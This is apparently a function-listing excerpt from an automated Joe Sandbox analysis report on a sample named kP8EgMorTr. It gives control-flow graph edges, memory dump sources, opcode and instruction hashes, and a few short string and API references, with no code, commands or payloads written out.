                                                                                            control_flow_graph 1433 31c8490-31c897e 1508 31c8984-31c8994 1433->1508 1509 31c8ed0-31c8f05 1433->1509 1508->1509 1510 31c899a-31c89aa 1508->1510 1513 31c8f07-31c8f0c 1509->1513 1514 31c8f11-31c8f2f 1509->1514 1510->1509 1512 31c89b0-31c89c0 1510->1512 1512->1509 1515 31c89c6-31c89d6 1512->1515 1516 31c8ff6-31c8ffb 1513->1516 1526 31c8fa6-31c8fb2 1514->1526 1527 31c8f31-31c8f3b 1514->1527 1515->1509 1517 31c89dc-31c89ec 1515->1517 1517->1509 1518 31c89f2-31c8a02 1517->1518 1518->1509 1520 31c8a08-31c8a18 1518->1520 1520->1509 1521 31c8a1e-31c8a2e 1520->1521 1521->1509 1523 31c8a34-31c8a44 1521->1523 1523->1509 1525 31c8a4a-31c8a5a 1523->1525 1525->1509 1528 31c8a60-31c8ecf 1525->1528 1533 31c8fc9-31c8fd5 1526->1533 1534 31c8fb4-31c8fc0 1526->1534 1527->1526 1532 31c8f3d-31c8f49 1527->1532 1541 31c8f6e-31c8f71 1532->1541 1542 31c8f4b-31c8f56 1532->1542 1539 31c8fec-31c8fee 1533->1539 1540 31c8fd7-31c8fe3 1533->1540 1534->1533 1544 31c8fc2-31c8fc7 1534->1544 1539->1516 1540->1539 1553 31c8fe5-31c8fea 1540->1553 1545 31c8f88-31c8f94 1541->1545 1546 31c8f73-31c8f7f 1541->1546 1542->1541 1555 31c8f58-31c8f62 1542->1555 1544->1516 1548 31c8ffc-31c901e 1545->1548 1549 31c8f96-31c8f9d 1545->1549 1546->1545 1556 31c8f81-31c8f86 1546->1556 1559 31c902e 1548->1559 1560 31c9020 1548->1560 1549->1548 1554 31c8f9f-31c8fa4 1549->1554 1553->1516 1554->1516 1555->1541 1565 31c8f64-31c8f69 1555->1565 1556->1516 1564 31c9030-31c9031 1559->1564 1560->1559 1563 31c9027-31c902c 1560->1563 1563->1564 1565->1516
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $q$$q
                                                                                            • API String ID: 0-3126353813
                                                                                            • Opcode ID: 2dbd598048d7d7cde8793001b515b37ac3e24fd777ae86c44a64bf3b54643fad
                                                                                            • Instruction ID: 00821e487404ad83d69a42b3d56c68b3faeab918cf2e024f7d81e13decbf53ff
                                                                                            • Opcode Fuzzy Hash: 2dbd598048d7d7cde8793001b515b37ac3e24fd777ae86c44a64bf3b54643fad
                                                                                            • Instruction Fuzzy Hash: 64521774A003198FEB65EBA4C860BAEBB76FF58300F1080ADD50A6B395CB359D85DF51
                                                                                            Function 031C9C30 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2158 31c9c30-31c9c51 2159 31c9c59-31c9c60 2158->2159 2196 31c9c53 call 31c9a10 2158->2196 2197 31c9c53 call 31c9c30 2158->2197 2160 31c9c6c-31c9c8c 2159->2160 2161 31c9c62-31c9c67 2159->2161 2164 31c9c8e-31c9c90 2160->2164 2165 31c9cc7-31c9cc9 2160->2165 2162 31c9d35-31c9d3c 2161->2162 2166 31c9c9f-31c9ca6 2164->2166 2167 31c9c92-31c9c97 2164->2167 2168 31c9ccb-31c9cd1 2165->2168 2169 31c9d30 2165->2169 2170 31c9cac-31c9cc5 2166->2170 2171 31c9d3f-31c9d6b call 31c9620 2166->2171 2167->2166 2168->2169 2172 31c9cd3-31c9cee 2168->2172 2169->2162 2170->2162 2183 31c9d6d-31c9d77 2171->2183 2184 31c9d79-31c9d82 call 31c9620 2171->2184 2177 31c9d25-31c9d27 2172->2177 2178 31c9cf0-31c9cf2 2172->2178 2177->2169 2182 31c9d29-31c9d2e 2177->2182 2180 31c9cf4-31c9cf9 2178->2180 2181 31c9d01-31c9d08 2178->2181 2180->2181 2181->2171 2185 31c9d0a-31c9d23 2181->2185 2182->2162 2183->2184 2190 31c9d84-31c9d8e 2184->2190 2191 31c9d90-31c9d99 2184->2191 2185->2162 2190->2191 2193 31c9da4-31c9dcd 2191->2193 2196->2159 2197->2159
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q$4'q
                                                                                            • API String ID: 0-1467158625
                                                                                            • Opcode ID: f29d4572286ee6837fc87e8b950c09a133d0e0906eaca4cfbd1949170efbedc1
                                                                                            • Instruction ID: a22a52fe524d70bb1c12af75707d0c124a7700a35ce659f17ca75e10746f7883
                                                                                            • Opcode Fuzzy Hash: f29d4572286ee6837fc87e8b950c09a133d0e0906eaca4cfbd1949170efbedc1
                                                                                            • Instruction Fuzzy Hash: 42518D347203849FDB10DB69C854B7ABBEAEB9C311F08846AE908DB395DB71CC0187A1
                                                                                            Function 031CAEBB Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2198 31caebb-31caec0 2199 31caec2-31caed9 2198->2199 2200 31caf33-31caf40 2198->2200 2203 31caedf-31caee3 2199->2203 2204 31caedb-31caedd 2199->2204 2205 31caf42-31caf4d 2200->2205 2206 31caf53-31caf5e 2200->2206 2207 31caee9-31caeea 2203->2207 2204->2207 2205->2206 2210 31cafd6 2205->2210 2211 31cb02f-31cb051 2206->2211 2212 31caf64-31cafc1 2206->2212 2213 31cafdb-31cb028 2210->2213 2221 31cafd3 2211->2221 2224 31cb053-31cb059 2211->2224 2219 31cafca-31cafd2 2212->2219 2213->2211 2219->2221 2224->2213 2225 31cb05b-31cb074 call 31c7c88 2224->2225 2231 31cb085-31cb093 2225->2231 2232 31cb076-31cb083 2225->2232 2238 31cb095-31cb09f 2231->2238 2239 31cb0a1 2231->2239 2237 31cb0a3-31cb0a6 2232->2237 2238->2237 2239->2237
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq$(oq
                                                                                            • API String ID: 0-1396055846
                                                                                            • Opcode ID: 0e32a390aac71c579649467466e62362c83ae5737fe9afa6f9dd8c309963a735
                                                                                            • Instruction ID: a1c8e86869fe39e12f67b6db88beecb4bc03791dc624e91fa0a1c43f6bb37b79
                                                                                            • Opcode Fuzzy Hash: 0e32a390aac71c579649467466e62362c83ae5737fe9afa6f9dd8c309963a735
                                                                                            • Instruction Fuzzy Hash: AF31CE72B142498FC705EF69E81576E7BB2AFDC610F18806EE51ACB390DF358C029B91
                                                                                            Function 031C0C8F Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2318 31c0c8f-31c0c91 2319 31c0c99-31c0c9a 2318->2319 2320 31c0c94-31c0c98 2318->2320 2321 31c0c9c-31c0ca0 2319->2321 2322 31c0ca1-31c0cc0 2319->2322 2320->2319 2321->2322 2323 31c0cc7-31c0cdd call 31c0780 2322->2323 2324 31c0cc2 2322->2324 2328 31c0ce2 2323->2328 2324->2323 2329 31c0cee-31c104e call 31c0780 * 13 2328->2329 2403 31c1056-31c105f 2329->2403 2514 31c1062 call 31c2790 2403->2514 2515 31c1062 call 31c27f0 2403->2515 2404 31c1068-31c108f call 31c3cc0 2518 31c1092 call 31c4285 2404->2518 2519 31c1092 call 31c41a0 2404->2519 2407 31c1098-31c10c2 2410 31c10cb-31c10ce call 31c5362 2407->2410 2411 31c10d4-31c10fe 2410->2411 2414 31c1107-31c110a call 31cc147 2411->2414 2415 31c1110-31c113a 2414->2415 2418 31c1143 2415->2418 2528 31c1146 call 31cc468 2418->2528 2529 31c1146 call 31cc147 2418->2529 2419 31c114c-31c1176 2422 31c117f-31c1182 call 31cc738 2419->2422 2423 31c1188-31c11b2 2422->2423 2426 31c11bb-31c11be call 31cca08 2423->2426 2427 31c11c4-31c11f7 2426->2427 2430 31c1203-31c1209 call 31ccff8 2427->2430 2431 31c120f-31c124b 2430->2431 2434 31c1257-31c125d call 31cd2cb 2431->2434 2435 31c1263-31c129f 2434->2435 2438 31c12ab-31c12b1 call 31cd599 2435->2438 2439 31c12b7-31c13d2 2438->2439 2452 31c13de-31c13f0 call 31c5362 2439->2452 2453 31c13f6-31c145c 2452->2453 2458 31c1467-31c1473 call 31cd869 2453->2458 2459 31c1479-31c1485 2458->2459 2460 31c1490-31c149c call 31cd869 2459->2460 2461 31c14a2-31c14ae 2460->2461 2462 31c14b9-31c14c5 call 31cd869 2461->2462 2463 31c14cb-31c14d7 2462->2463 2464 31c14e2-31c14ee call 31cd869 2463->2464 2465 31c14f4-31c1500 2464->2465 2466 31c150b-31c1517 call 31cd869 2465->2466 2467 31c151d-31c1529 2466->2467 2468 31c1534-31c1540 call 31cd869 2467->2468 2469 31c1546-31c1552 2468->2469 2470 31c155d-31c1569 call 31cd869 2469->2470 2471 31c156f-31c158c 2470->2471 2473 31c1597-31c15a3 call 31cd869 2471->2473 2474 31c15a9-31c15b5 2473->2474 2475 31c15c0-31c15cc call 31cd869 2474->2475 2476 31c15d2-31c15de 2475->2476 2477 31c15e9-31c15f5 call 31cd869 2476->2477 2478 31c15fb-31c1607 2477->2478 2479 31c1612-31c161e call 31cd869 2478->2479 2480 31c1624-31c1630 2479->2480 2481 31c163b-31c1647 call 31cd869 2480->2481 2482 31c164d-31c1659 2481->2482 2483 31c1664-31c1670 call 31cd869 2482->2483 2484 31c1676-31c1682 2483->2484 2485 31c168d-31c1699 call 31cd869 2484->2485 2486 31c169f-31c16ab 2485->2486 2487 31c16b6-31c16c2 call 31cd869 2486->2487 2488 31c16c8-31c16d4 2487->2488 2489 31c16df-31c16eb call 31cd869 2488->2489 2490 31c16f1-31c17aa 2489->2490 2514->2404 2515->2404 2518->2407 2519->2407 2528->2419 2529->2419
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LRq
                                                                                            • API String ID: 0-3187445251
                                                                                            • Opcode ID: e16f9df8bbcdb872146e35005996e7fe24a5ca2fdefbb9a85aca3126cf2402d4
                                                                                            • Instruction ID: ac03ef90f6d0d5238b5f9fa5828eba467832db7688cacc6ab19e55942f3acca0
                                                                                            • Opcode Fuzzy Hash: e16f9df8bbcdb872146e35005996e7fe24a5ca2fdefbb9a85aca3126cf2402d4
                                                                                            • Instruction Fuzzy Hash: 7652DB75E00219CFCB64DF28E998A9DBBB2FB4D311F5081A9E409AB354DB345E81CF91
                                                                                            Function 031C0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LRq
                                                                                            • API String ID: 0-3187445251
                                                                                            • Opcode ID: ad8184d63315efb6803f9b9a7f9adf3f7dcb222ae0c3b91b799ee19edc629ba7
                                                                                            • Instruction ID: 924af009a3b783d5c93f12f29e9fa0d5ac2736001fd92ea4c51282442aae119d
                                                                                            • Opcode Fuzzy Hash: ad8184d63315efb6803f9b9a7f9adf3f7dcb222ae0c3b91b799ee19edc629ba7
                                                                                            • Instruction Fuzzy Hash: 4452D975E00219CFCB64DF28E998A9DBBB2FB4D311F5081A9E409AB354DB345E81CF91
                                                                                            Function 05E99B94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 05E99CD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3703933664.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_5e90000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: af7822b4e340bb5e2973faa9747ed232b1c7b52930c28418f03002d47ce55779
                                                                                            • Instruction ID: 1e03ff49e8b4c9ad588a647d745a4035e3b437d663279d671cb45b49ff935b14
                                                                                            • Opcode Fuzzy Hash: af7822b4e340bb5e2973faa9747ed232b1c7b52930c28418f03002d47ce55779
                                                                                            • Instruction Fuzzy Hash: A6116D74E042099FEF08DBA8D984EFDBBF5FB98305F148159E844E7246D730A941CBA0
                                                                                            Function 031CE270 Relevance: .7, Instructions: 675COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4dda803ed9974ebe02cbf791ef425c7e1a3d76635785cc6fdce09a69ea7552a
                                                                                            • Instruction ID: 775039fdbdbb411aff7ff0c5ab19d5732297da315fa562370f3d18ffd6b1336c
                                                                                            • Opcode Fuzzy Hash: a4dda803ed9974ebe02cbf791ef425c7e1a3d76635785cc6fdce09a69ea7552a
                                                                                            • Instruction Fuzzy Hash: C722B6740313568FE7516B30A6AE52ABF69FB4F323704EC15F80AC8859DF300489EB22
                                                                                            Function 031CE2A8 Relevance: .6, Instructions: 647COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50db4e186a59aaed589bf2dc4eac8a69fc2a6fadd58e3cbc7b23a5e9fcd42193
                                                                                            • Instruction ID: b26305dbab8c82afbfc35065a4fbeb76dcf4959960202d97c4f93e50623c24f1
                                                                                            • Opcode Fuzzy Hash: 50db4e186a59aaed589bf2dc4eac8a69fc2a6fadd58e3cbc7b23a5e9fcd42193
                                                                                            • Instruction Fuzzy Hash: 691294740313568FE6516B20A6AE52EBF69FB5F323704EC15F80EC88589F710589EF26
                                                                                            Function 031C5F38 Relevance: .3, Instructions: 266COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a3880ec264ddbdd40ba392d0a1f86bf807f7febaa94c6ec4b2d05f34e390f36
                                                                                            • Instruction ID: c0c44fc81b8d9e69e0c4236c0294e3ac57068f9ab9fe31b4e0c416ef93b4d687
                                                                                            • Opcode Fuzzy Hash: 4a3880ec264ddbdd40ba392d0a1f86bf807f7febaa94c6ec4b2d05f34e390f36
                                                                                            • Instruction Fuzzy Hash: 8D91CC703143858FDB1ADF65D858B6E7BB2ABDD200F18846EE4468B395DF38C842DB91
                                                                                            Function 031C6498 Relevance: .2, Instructions: 227COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 076b83bcae7b7bc6dce3db643071c6bb3012d37e78314beb58aa01ef60007ce9
                                                                                            • Instruction ID: 065555d4316c6418ffd78a19905f06d899e75257bd579546929889c3358fe982
                                                                                            • Opcode Fuzzy Hash: 076b83bcae7b7bc6dce3db643071c6bb3012d37e78314beb58aa01ef60007ce9
                                                                                            • Instruction Fuzzy Hash: 3C81AF34A10656DFCB18CF69C884A69FBB2FF9D210B2D816DD406EB365DB31E841CB90
                                                                                            Function 031C9A10 Relevance: .2, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54f761cc275332b7961d0239bfc8c25006ccf7352fa9a5b30574d79594142d5c
                                                                                            • Instruction ID: 7bbe33dda18b4b6f27e081b0d32100ae4bc04a75bf341f954f10023ead353fb8
                                                                                            • Opcode Fuzzy Hash: 54f761cc275332b7961d0239bfc8c25006ccf7352fa9a5b30574d79594142d5c
                                                                                            • Instruction Fuzzy Hash: 8D8129315106869FC711CF28C884A9AFBB6FF99324F15C2AAD8589B391D731E815CBE1
                                                                                            Function 031C80D8 Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b7f47cb164067ded1e35a900562bfc6b6b7e38bd6a818e0a63e21fcfeff2157d
                                                                                            • Instruction ID: c41f9b335e0bb3654ddf721b976537768d0b0d089d0ebed9d74063e81039ae75
                                                                                            • Opcode Fuzzy Hash: b7f47cb164067ded1e35a900562bfc6b6b7e38bd6a818e0a63e21fcfeff2157d
                                                                                            • Instruction Fuzzy Hash: AC713C347206858FCB25DF68C888A6EBBE5AF6D340B1940AAE806DB371DB70DC41CB51
                                                                                            Function 031CF5AF Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9c6a9fd636f48ad089424c20fca1e0ac47112224f8f379f38cf18d224907283
                                                                                            • Instruction ID: 466987f09b060a636c57fb728d3a1f37080cfb670b6cb421d6e05b0df051a2b8
                                                                                            • Opcode Fuzzy Hash: c9c6a9fd636f48ad089424c20fca1e0ac47112224f8f379f38cf18d224907283
                                                                                            • Instruction Fuzzy Hash: 0E51D274D01318CFDB15DFA5D858BADBBB2FF89300F608169E805AB294DB796946CF40
                                                                                            Function 031CD869 Relevance: .1, Instructions: 136COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d49d1ed68df865be4f45b419c27937e333696bf4026a21d9b8ba042fab534eac
                                                                                            • Instruction ID: ac7d3b7724267f06c1d10f272be3cf381d3450d7c0831449b4ede3ae53e29627
                                                                                            • Opcode Fuzzy Hash: d49d1ed68df865be4f45b419c27937e333696bf4026a21d9b8ba042fab534eac
                                                                                            • Instruction Fuzzy Hash: A051B774E01208DFDB54DFAAD98499DBBF2FF89310F24816AE819AB364DB319805CF10
                                                                                            Function 031C41A0 Relevance: .1, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f3cf426f13b914f2fbef89fc173bf7fd8138dc7c5c7feaaa7e9b34a77879aec
                                                                                            • Instruction ID: c887f790d0f79274840a84f428ac04c4d7a3873b1b5ced3b438c75b3b8a9b9df
                                                                                            • Opcode Fuzzy Hash: 1f3cf426f13b914f2fbef89fc173bf7fd8138dc7c5c7feaaa7e9b34a77879aec
                                                                                            • Instruction Fuzzy Hash: EE518F74E01308CFDB08DFA9E59499DBBB2FF8D310B609169E815AB364DB35A842CF50
                                                                                            Function 031CA303 Relevance: .1, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d0070a8eda61599da57bfbf64956af5cf105d461ed1da16f4c365c113a32d19
                                                                                            • Instruction ID: 581c216090b954ad010e328a0c12073b0cf115b574896a0b38d40cf5fac62da8
                                                                                            • Opcode Fuzzy Hash: 4d0070a8eda61599da57bfbf64956af5cf105d461ed1da16f4c365c113a32d19
                                                                                            • Instruction Fuzzy Hash: 11416B31A1029DDFCF16CFA8C858ADDBFB6BF59310F088159E945AB2A1D334E954CB50
                                                                                            Function 031C6FC8 Relevance: .1, Instructions: 112COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f8b7bb9e112c2dc25b43885a1050770d9a7728b91ea5dfc779e854fa424f8aa
                                                                                            • Instruction ID: faabe74e31bbd6fcb26ba349bb9cafd8e2bf4bdb6593168fcbe13a5d71d4fbfc
                                                                                            • Opcode Fuzzy Hash: 4f8b7bb9e112c2dc25b43885a1050770d9a7728b91ea5dfc779e854fa424f8aa
                                                                                            • Instruction Fuzzy Hash: E041C130604389DFDB15CF64C804B6EBBB6EB5A310F0880AEE8159B291DBB5DD55CFA1
                                                                                            Function 031C3CC0 Relevance: .1, Instructions: 112COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c36223d72c0b2f6aad7375b3dd50e17ce4d90bbe785c13a68984e287aa93266
                                                                                            • Instruction ID: a3274f27db232f280e127942a09a0dee6017f8bc28ba783e9eb66be609d1b201
                                                                                            • Opcode Fuzzy Hash: 7c36223d72c0b2f6aad7375b3dd50e17ce4d90bbe785c13a68984e287aa93266
                                                                                            • Instruction Fuzzy Hash: 1831D839B203A487DF2C85695D6437EA5AAABDC250F5C883DD826C7380DF7DCC4587A1
                                                                                            Function 031C5658 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b2692facac8ab7cbc80a231fbd95b436046649ede94a51ec25af28aee19a4e2
                                                                                            • Instruction ID: 42316691ce28ca01432e3d4f751d829716442bff89f0b7a5295eed9dd41247b3
                                                                                            • Opcode Fuzzy Hash: 2b2692facac8ab7cbc80a231fbd95b436046649ede94a51ec25af28aee19a4e2
                                                                                            • Instruction Fuzzy Hash: 0F31B131200249DFCF019F65E844AAE3F76FB6D710F448029F9099B254DB35D952EBA0
                                                                                            Function 031C2790 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: af76d4c91313f7f7c93571500a7170d7d09d5d293c56a7eb0d2345d4f15d5be0
                                                                                            • Instruction ID: 201717fc2642c70ba8a52fd1111ec04e807941d5c4a0d004e741dd6f2e738be4
                                                                                            • Opcode Fuzzy Hash: af76d4c91313f7f7c93571500a7170d7d09d5d293c56a7eb0d2345d4f15d5be0
                                                                                            • Instruction Fuzzy Hash: 0D317671D143898FDB04EFA8D8456EEBFF5FB6E310F14456AD805AB260EB340942CBA1
                                                                                            Function 031C8370 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5632ae8a4fa43f25dc6eaaaed14f8fe19ec36d63d4b65c13a063cafb035933ad
                                                                                            • Instruction ID: 6f20c20515b1761b9aee45da26e57f93631cee7d3d1322350d253aa56712d14b
                                                                                            • Opcode Fuzzy Hash: 5632ae8a4fa43f25dc6eaaaed14f8fe19ec36d63d4b65c13a063cafb035933ad
                                                                                            • Instruction Fuzzy Hash: 0A2106313243904BDB25973988D47BE7A9AAFDD609B08807DE502CB395EF35C842D741
                                                                                            Function 031C8380 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 63bbe2f72ff0231a50f32af98896455ba1ea6786d177319f0ce96d7df6338718
                                                                                            • Instruction ID: 5a42bf09a66c37f15d0e4934c6e14a823a4772ce3e50921ca24e7bd20fb66b85
                                                                                            • Opcode Fuzzy Hash: 63bbe2f72ff0231a50f32af98896455ba1ea6786d177319f0ce96d7df6338718
                                                                                            • Instruction Fuzzy Hash: 7121F5313242504BDB24962984D47BE769BAFDD709F18807DE502CB799EF35CC42D381
